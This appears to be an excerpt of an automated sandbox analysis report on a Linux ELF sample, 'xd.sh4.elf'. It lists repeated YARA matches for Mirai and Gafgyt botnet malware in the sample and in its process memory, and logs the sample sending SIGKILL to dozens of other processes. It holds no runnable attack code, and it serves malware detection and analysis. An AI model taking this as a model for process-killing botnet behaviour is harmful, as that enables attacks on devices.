              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects Mirai Botnet Malware Author: Florian Roth
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
              Source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 936, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 490, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 726, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 727, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 765, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 767, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 778, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 780, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 783, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 790, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 792, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 793, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 795, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 797, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 800, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 802, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 803, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 855, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 1410, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 1411, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 1432, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 2935, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 2936, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 2970, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 3095, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 3100, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 3132, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5253, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5396, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5397, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5534, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5564, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5421)SIGKILL sent: pid: -5421, result: unknownJump to behavior
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 936, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 490, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 726, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 727, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 765, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 767, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 778, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 780, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 783, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 790, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 792, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 793, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 795, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 797, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 800, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 802, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 803, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 855, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 1410, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 1411, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 1432, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 2935, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 2936, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 2970, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 3095, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 3100, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 3132, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5253, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5396, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5397, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5534, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)SIGKILL sent: pid: 5564, result: successfulJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5421)SIGKILL sent: pid: -5421, result: unknownJump to behavior
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: xd.sh4.elf, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: xd.sh4.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5423.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5421.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5419.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5427.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5414.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
